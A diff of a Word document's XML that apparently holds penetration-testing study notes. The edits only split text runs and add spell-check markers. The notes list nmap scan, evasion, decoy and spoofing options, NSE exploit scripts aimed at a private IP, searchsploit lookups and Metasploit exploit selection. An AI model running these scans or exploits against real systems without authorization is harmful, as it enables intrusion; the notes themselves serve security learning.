+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1624,7 +1820,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -sS {IPADDRESS}</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1655,8 +1867,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sU</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1672,7 +1905,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -s</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>s</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1681,6 +1922,7 @@
               </w:rPr>
               <w:t>T</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1721,8 +1963,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>man nmap</w:t>
-            </w:r>
+              <w:t xml:space="preserve">man </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – manual, really helps!</w:t>
             </w:r>
@@ -1773,14 +2023,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
             </w:r>
             <w:r>
               <w:t>O</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1807,8 +2078,37 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1819,24 +2119,115 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo nmap -A {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>nmap -sn {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -A {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -1850,12 +2241,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1876,7 +2276,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1925,8 +2341,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -f {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -1979,17 +2416,46 @@
           <w:p>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{ipaddress}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -sS</w:t>
-            </w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -2031,10 +2497,58 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, D {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2081,8 +2595,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Pn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2153,12 +2688,27 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo </w:t>
-            </w:r>
-            <w:r>
-              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2175,14 +2725,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
+              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2193,8 +2764,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2203,8 +2795,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2229,9 +2842,19 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2242,11 +2865,32 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>anon.nse</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2282,8 +2926,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>searchploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2305,8 +2957,37 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2318,7 +2999,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (vsftpd 2.3.)</w:t>
+              <w:t>Find version (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>vsftpd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2330,7 +3019,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Google it if theres already existing exploitation</w:t>
+              <w:t xml:space="preserve">Google it if </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>theres</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2342,8 +3039,13 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:r>
-              <w:t>Searchsploit {version}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2535,12 +3237,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Metaploit Framework Structure</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Framework Structure</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2571,7 +3282,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Cd /usr/share/Metasploit-framework</w:t>
+              <w:t>Cd /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>usr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/share/Metasploit-framework</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2620,6 +3347,7 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2627,6 +3355,7 @@
               </w:rPr>
               <w:t>msfconsole</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
@@ -2702,7 +3431,15 @@
               <w:t>Use exploit/</w:t>
             </w:r>
             <w:r>
-              <w:t>windows/smb/ms06_040.netapi</w:t>
+              <w:t>windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/ms06_040.netapi</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2784,12 +3521,14 @@
             <w:r>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>paypload</w:t>
             </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -2880,18 +3619,58 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchsploit {version}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
@@ -2910,12 +3689,28 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use exploit/unix/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show payploads or show options</w:t>
+              <w:t>CL: use exploit/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>unix</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>payploads</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> or show options</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2939,17 +3734,33 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Netcat – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: nc -help</w:t>
+              <w:t>Netcat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -help</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2981,8 +3792,33 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: Searchsploit Linux tetnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
